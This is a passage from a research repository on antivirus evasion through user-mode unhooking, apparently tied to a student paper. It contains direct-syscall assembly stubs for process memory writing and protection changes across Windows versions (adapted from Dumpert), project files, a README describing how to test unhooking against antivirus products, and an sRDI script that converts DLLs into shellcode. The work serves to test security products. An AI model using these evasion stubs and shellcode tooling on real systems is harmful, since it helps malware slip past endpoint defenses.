rcx 187 | mov eax, 53h 188 | syscall 189 | ret 190 | NtCreateFile80 endp 191 | 192 | ; Windows 8.1 / Server 2012 R2 specific syscalls 193 | 194 | ZwOpenProcess81 proc 195 | mov r10, rcx 196 | mov eax, 25h 197 | syscall 198 | ret 199 | ZwOpenProcess81 endp 200 | 201 | ZwClose81 proc 202 | mov r10, rcx 203 | mov eax, 0Eh 204 | syscall 205 | ret 206 | ZwClose81 endp 207 | 208 | ZwWriteVirtualMemory81 proc 209 | mov r10, rcx 210 | mov eax, 39h 211 | syscall 212 | ret 213 | ZwWriteVirtualMemory81 endp 214 | 215 | ZwProtectVirtualMemory81 proc 216 | mov r10, rcx 217 | mov eax, 4Fh 218 | syscall 219 | ret 220 | ZwProtectVirtualMemory81 endp 221 | 222 | ZwQuerySystemInformation81 proc 223 | mov r10, rcx 224 | mov eax, 35h 225 | syscall 226 | ret 227 | ZwQuerySystemInformation81 endp 228 | 229 | NtAllocateVirtualMemory81 proc 230 | mov r10, rcx 231 | mov eax, 17h 232 | syscall 233 | ret 234 | NtAllocateVirtualMemory81 endp 235 | 236 | NtFreeVirtualMemory81 proc 237 | mov r10, rcx 238 | mov eax, 1Dh 239 | syscall 240 | ret 241 | NtFreeVirtualMemory81 endp 242 | 243 | NtCreateFile81 proc 244 | mov r10, rcx 245 | mov eax, 54h 246 | syscall 247 | ret 248 | NtCreateFile81 endp 249 | 250 | ; Windows 10 / Server 2016 specific syscalls 251 | 252 | ZwOpenProcess10 proc 253 | mov r10, rcx 254 | mov eax, 26h 255 | syscall 256 | ret 257 | ZwOpenProcess10 endp 258 | 259 | ZwClose10 proc 260 | mov r10, rcx 261 | mov eax, 0Fh 262 | syscall 263 | ret 264 | ZwClose10 endp 265 | 266 | ZwWriteVirtualMemory10 proc 267 | mov r10, rcx 268 | mov eax, 3Ah 269 | syscall 270 | ret 271 | ZwWriteVirtualMemory10 endp 272 | 273 | ZwProtectVirtualMemory10 proc 274 | mov r10, rcx 275 | mov eax, 50h 276 | syscall 277 | ret 278 | ZwProtectVirtualMemory10 endp 279 | 280 | ZwQuerySystemInformation10 proc 281 | mov r10, rcx 282 | mov eax, 36h 283 | syscall 284 | ret 285 | ZwQuerySystemInformation10 endp 286 | 287 | NtAllocateVirtualMemory10 proc 288 | mov r10, rcx 289 | mov eax, 18h 290 | syscall 291 | ret 292 | NtAllocateVirtualMemory10 endp 293 | 294 | NtFreeVirtualMemory10 proc 295 | mov r10, rcx 296 | mov eax, 1Eh 297 | syscall 298 | ret 299 | NtFreeVirtualMemory10 endp 300 | 301 | NtCreateFile10 proc 302 | mov r10, rcx 303 | mov eax, 55h 304 | syscall 305 | ret 306 | NtCreateFile10 endp 307 | 308 | end 309 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | 4 | end -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 17 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 18 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 20 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 21 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 23 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert/Outflank-Dumpert.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | OutflankDumpert 24 | 10.0 25 | Outflank-Dumpert 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 17 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 18 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 20 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 21 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 23 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert/Outflank-Dumpert.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | OutflankDumpert 24 | 10.0 25 | Outflank-Dumpert 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # User Mode Unhooking test script 2 | This project is created for research into antivirus evasion by unhooking. The paper containing additional information and references can be found here: https://rp.os3.nl/2020-2021/p68/report.pdf. The repo contains scripts and source code for running unhooking techniques on different payloads to test the resilience of an antivirus product to such unhooking techniques. 3 | 4 | Two of the five implemented techniques are novell techniques that can be used if an antivirus product hooks different functions on different processes of the same user: 5 | - Interprocess Function Copying 6 | - Interprocess Section Copying 7 | 8 | ## Usage 9 | 10 | ### Preparation 11 | - The output filename at the top of the RunAllExperiments.ps1 PowerShell script can be adjusted to specify the right output filename. 12 | - Make sure the Visual Studio projects for unhooking techniques are compiled. 13 | - Compile different payloads for every experiment and collect the files needed for the experiments by running exportFiles.bat. 14 | - Create a baseline file containing unhooked .dll info by running "HookFinder -1" on a system without antivirus. 15 | - Copy the files to the target machine. 16 | 17 | ### Running The Experiments 18 | - Make sure you are logged in with user permissions (or use "runas /trustlevel:0x20000"). 19 | - Run powershell ./RunAllExperiments.ps1 20 | - The hooks in memory will be written to txt files and the status of return codes of payloads and unhooking applications will be displayed in the output of the script. 21 | - Because every antivirus product is different, a manual check is required to see which antivirus alerts are generated. 22 | 23 | ### Troubleshooting 24 | - The payloads created trigger specific functions. If other functions are hooked, you have to manually adjust Prologue Restoring. 25 | - Required hardcoded bytes of Prologue Restoring depend on the targeted Windows version. 26 | - Perun's Fart is limited to unhooking ntdll.dll. 27 | 28 | ## Directory Content 29 | - "CustomCode" contains code for payloads and unhooking techniques that were created for this research. 30 | - "DumpertResearch" and "ShellycoatResearch" contain adjusted versions of Dumpert and ShellyCoat respectively. Both unhooking techniques target an other process. 31 | - "ExperimentScript" contains the PowerShell script that runs different techniques on different payloads. 32 | - "ApplicationsToCheckForHooks" contain Visual Studio boilerplate code for applications that can be run on antivirus software to see if these are getting hooked. 33 | - "HookCorruptor" contains code, based on Dumpert, for checking if hooks are triggered (see Troubleshooting that we mentioned earlier). 34 | 35 | ## Acknowledgements 36 | This research is based on some of the valuable tools, blogs and proof-of-concepts on unhooking that are published by members of the security community. 37 | The implemented unhooking techniques, e.g., were, where possible, created by using and adjusting parts of existing code from projects like Shellycoat and Dumpert. References to these projects can be found in the paper that we mentioned above 38 | 39 | -------------------------------------------------------------------------------- /ShellycoatResearch/Bin/shellycoat_x64-hexedited.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Bin/shellycoat_x64-hexedited.bin -------------------------------------------------------------------------------- /ShellycoatResearch/Bin/shellycoat_x64-hexedited.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Bin/shellycoat_x64-hexedited.dll -------------------------------------------------------------------------------- /ShellycoatResearch/Bin/shellycoat_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Bin/shellycoat_x64.dll -------------------------------------------------------------------------------- /ShellycoatResearch/Python/ConvertToShellcode.py: -------------------------------------------------------------------------------- 1 | # Taken from sRDI project 2 | 3 | import argparse 4 | from ShellcodeRDI import * 5 | 6 | __version__ = '1.2' 7 | 8 | def main(): 9 | parser = argparse.ArgumentParser(description='RDI Shellcode Converter', conflict_handler='resolve') 10 | parser.add_argument('-v', '--version', action='version', version='%(prog)s Version: ' + __version__) 11 | parser.add_argument('input_dll', help='DLL to convert to shellcode') 12 | parser.add_argument('-f', '--function-name', dest='function_name', help='The function to call after DllMain', default='SayHello') 13 | parser.add_argument('-u', '--user-data', dest='user_data', help='Data to pass to the target function', default='dave') 14 | parser.add_argument('-c', '--clear-header', dest='clear_header', action='store_true', help='Clear the PE header on load') 15 | parser.add_argument('-i', '--obfuscate-imports', dest='obfuscate_imports', action='store_true', help='Randomize import dependency load order', default=False) 16 | parser.add_argument('-d', '--import-delay', dest='import_delay', help='Number of seconds to pause between loading imports', type=int, default=0) 17 | arguments = parser.parse_args() 18 | 19 | input_dll = arguments.input_dll 20 | output_bin = input_dll.replace('.dll', '.bin') 21 | 22 | print('Creating Shellcode: {}'.format(output_bin)) 23 | dll = open(arguments.input_dll, 'rb').read() 24 | 25 | flags = 0 26 | 27 | if arguments.clear_header: 28 | flags |= 0x1 29 | 30 | if arguments.obfuscate_imports: 31 | flags = flags | 0x4 | arguments.import_delay << 16 32 | 33 | converted_dll = ConvertToShellcode(dll, HashFunctionName(arguments.function_name), arguments.user_data.encode(), flags) 34 | 35 | with open(output_bin, 'wb') as f: 36 | f.write(converted_dll) 37 | 38 | if __name__ == '__main__': 39 | main() 40 | -------------------------------------------------------------------------------- /ShellycoatResearch/Python/__pycache__/ShellcodeRDI.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Python/__pycache__/ShellcodeRDI.cpython-39.pyc -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/bypass-techniques.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/bypass-techniques.png -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/capa.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/capa.PNG -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/hooking.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/hooking.gif -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/reading-ntdll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/reading-ntdll.png -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/section-remapping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/section-remapping.png -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/shellycoat-internal.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/shellycoat-internal.gif -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/unhooking.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/unhooking.gif -------------------------------------------------------------------------------- 